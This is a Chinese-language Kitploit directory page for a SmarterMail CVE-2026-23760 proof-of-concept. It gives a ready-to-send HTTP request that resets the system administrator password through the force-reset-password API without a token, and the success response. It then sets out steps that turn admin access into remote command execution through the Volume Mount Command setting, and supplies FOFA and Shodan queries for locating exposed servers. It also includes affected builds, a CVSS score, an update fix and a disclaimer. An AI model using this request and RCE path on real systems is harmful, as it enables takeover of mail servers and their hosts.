Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
smartermail-CVE-2026-23760-poc — CVE-2026-23760 - SmarterMail 中通过密码重置 API 实现的身份验证绕过。 | Kitploit
工具/GitHubGitHub/maxmnml/smartermail-cve-2026-23760-poc
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubmaxmnml/smartermail-cve-2026-23760-poc

smartermail-CVE-2026-23760-poc

CVE-2026-23760 - SmarterMail 中通过密码重置 API 实现的身份验证绕过。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
82158个月前尚未审核

SmarterMail-CVE-2026-23760-poc

一个利用密码重置 API 绕过 SmaretMail 系统管理员账户认证的概念验证。

漏洞

该漏洞源于密码重置 API 中的认证绕过漏洞。force-reset-password 端点允许匿名请求,并且在重置系统管理员账户时未能验证现有密码或重置令牌。

  • 系统管理员账户接管。
  • 通过 SmarterMail 内置功能直接实现远程代码执行。

受影响版本

  • SmarterTools SmarterMail 版本低于 build 9511

PoC(由 watchtowr labs 提供)

该 PoC 非常简单:

POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145

{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}

您将收到以下响应,确认密码已成功修改:

{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}

唯一剩下的要求是知道管理员账户的用户名。

从 ATO 到 RCE 及更远

一旦以系统管理员身份认证成功,攻击者可以:

  • 导航到 Settings -> Volume Mounts。
  • 创建新卷。
  • 在 Volume Mount Command 字段中提供任意命令。

该命令由底层操作系统执行。此时,攻击者已在主机上实现了完整的远程代码执行。

当配置保存时,所提供的命令会立即执行。

自动化

Nuclei 模板:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml

野外利用

FOFA:

title='SmarterMail'

SHODAN:

html:'SmarterMail'

影响

未认证的远程攻击者可以绕过系统管理员账户的认证并获得访问权限。一旦认证成功,他们可以在主机上完成完整的远程代码执行。

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:严重

修复与缓解措施

更新至最新版本:https://www.smartertools.com/smartermail/downloads

  • Build 9511(2026 年 1 月 15 日)
  • Build 9518(2026 年 1 月 22 日)

参考

  • SmarterMail 发布说明
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760
  • watchTowr 博客和 PoC

免责声明

此工具仅用于授权安全测试。未经授权访问计算机系统属于违法行为。

下载工具